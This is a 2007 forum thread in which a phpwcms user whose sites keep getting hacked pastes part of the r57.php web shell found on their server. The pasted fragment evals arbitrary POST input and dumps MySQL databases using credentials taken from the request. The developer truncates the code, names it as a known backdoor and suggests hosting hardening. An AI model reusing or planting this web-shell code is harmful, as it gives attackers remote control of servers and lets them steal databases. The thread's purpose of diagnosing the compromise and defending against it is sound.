Page 2 of 2

Posted: Tue 2. Oct 2007, 01:23
by C3 Motorsport
Oliver Georgi wrote: Normally phpwcms is (should be) safe - and I have not heard of any other hacked 1.3.3.

Oliver
I posted this one not too long ago...

http://www.phpwcms.de/forum/viewtopic.php?t=15646

I've been hacked over and oever and over again. It's getting really old and I'm on the verge of moving to something else if I can't find out why.

I really love the program and would hate to have to transition to something else...but when I have about 40 sites on the same server and ONLY the phpWCMS ones are getting hit...something is wrong.

My hosting: Fatnetwork (reseller hosting, shared servers, globalvars is on - not sure how to turn them off if I don't own the server - and safemode is off)

Also, here is the code for the file that I found on my server allowing it to gain access to virtually everything...I can't read arabic, so I'm not sure just how far it really goes. Oliver, I hope you can make some REAL sense of this and hopefully identify some way we can protect ourselves from it.

The file was saved as r57.php and if you Google that, there are TONS of reports of people being hacked by it. Mambo, phpWCMS, and other users alike.

Code: Select all

","",$eval);
 @eval($eval);}
if ($_POST['cmd']=="mysql_dump")
 {
  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
  $sql = new my_sql();
  $sql->db   = $_POST['db'];
  $sql->host = $_POST['db_server'];
  $sql->port = $_POST['db_port'];
  $sql->user = $_POST['mysql_l'];
  $sql->pass = $_POST['mysql_p'];
  $sql->base = $_POST['mysql_db'];
  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
  else {
   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
   else { echo "[-] ERROR! Can't write in dump file"; }
   }
 }
echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";

...........

[Notice: Code partially removed by Oliver]


Posted: Tue 2. Oct 2007, 07:20
by Oliver Georgi
@C3 Motorsport
1) What release of phpwcms do you use?
2) Do you use any hack of phpwcms?
3) How do you remove it from system?

What's installed on your system is PHP.RSTBackdoor
http://securityresponse.symantec.com/se ... 22-4217-99

If you wish you can send me FTP login and I will have a look and check your system to see possible leaks and give you a detailed report.

The most important is register_globals Off.


Oliver

Posted: Tue 2. Oct 2007, 07:48
by C3 Motorsport
Oliver Georgi wrote:@C3 Motorsport
1) What release of phpwcms do you use?
2) Do you use any hack of phpwcms?
3) How do you remove it from system?

What's installed on your system is PHP.RSTBackdoor
http://securityresponse.symantec.com/se ... 22-4217-99

If you wish you can send me FTP login and I will have a look and check your system to see possible leaks and give you a detailed report.

The most important is register_globals Off.


Oliver
Oliver,

Thank you very much for responding so quickly. I can understand why you removed some of the code. I just posted it so you would know specifically what I was dealing with.

The version I am using on all of my sites is 1.3.3

http://www.jason-steele.com
http://www.c3motorsport.com
http://www.5-75.org
http://www.blackwidowproject.com

As for setting the register_globals to off...I don't own the server, and I do not believe that FatNetwork will make the appropriate change solely for me, given the large number of people on the servers.

I will PM you with the pertinent login info and would greatly appreciate any guidance/direction yo ucan give me to seal up this hacking nightmare.

Posted: Wed 3. Oct 2007, 10:20
by MattDwyer
One of my sites running 1.3.3 was hacked just recently, however it was ftp they broke into, not the website itself. They downloaded dozens of pages, altered, and re-uploaded them. It got my client blacklisted by Google for a few days.

Another client (also running 1.3.3) is seeing daily attempts to inject a url.
The url's point to php information gathering scripts, but I tried it myself and got nothing other than the expected webpage.

I'm pretty certain that kind of attack will never work, but if someone would like to confirm that with a quick reply, I'd be much relieved. I am still monitoring the site and checking various settings just to be safe.

Posted: Wed 3. Oct 2007, 10:51
by Oliver Georgi
I could check the hosting account of C3 Motorsport. It has multiple additional problems:
- safe_mode = Off
- register_globals = On
- open_basedir not set
- 3rd party scripts with known problems
- older releases of cPanel

So it is/was really hard to say exactly where injection comes from.

Oliver

Posted: Wed 3. Oct 2007, 22:14
by C3 Motorsport
Oliver Georgi wrote:I could check the hosting account of C3 Motorsport. It has multiple additional problems:
- safe_mode = Off
- register_globals = On
- open_basedir not set
- 3rd party scripts with known problems
- older releases of cPanel

So it is/was really hard to say exactly where injection comes from.

Oliver
Oliver has been a great help to me in identifying a lot of these issues, and I'm very grateful for his time. I've started implementing some of the corrective measures he's suggested on my other accounts and hopefully they will suppress most of the future attacks.

My next question is this, through the .htaccess and _.htaccess files, how do I set the safe_mod to "on" for the local account (much like we did for register_globals) and then set the "open_basedir"?

The cPanel I can do little about, and all 3rd party applications have been removed from my account with the exception of 1 commercial program which has no security issues that I'm aware of.

Posted: Thu 4. Oct 2007, 05:14
by Pappnase
hello

if you google a litle you find that these settings can only changed by your host.

but it think thats not your biggest problem ... some of the settings are equal with my settings ...

maybe you should take a look at your logifiles and search for the phpfile wich was uploading to your space. there you should also see wich script they use for uploading.
Oliver Georgi
- 3rd party scripts with known problems
- older releases of cPanel

Posted: Thu 4. Oct 2007, 07:33
by Oliver Georgi
register_globals is at 1st the best you can do and which always have to be set off - it's the default PHP configuration since several years. In combination with safe_mode On it's better but not that important as register_globals set Off.

Oliver

Posted: Thu 4. Oct 2007, 09:32
by C3 Motorsport
Got it. Thanks for the tip!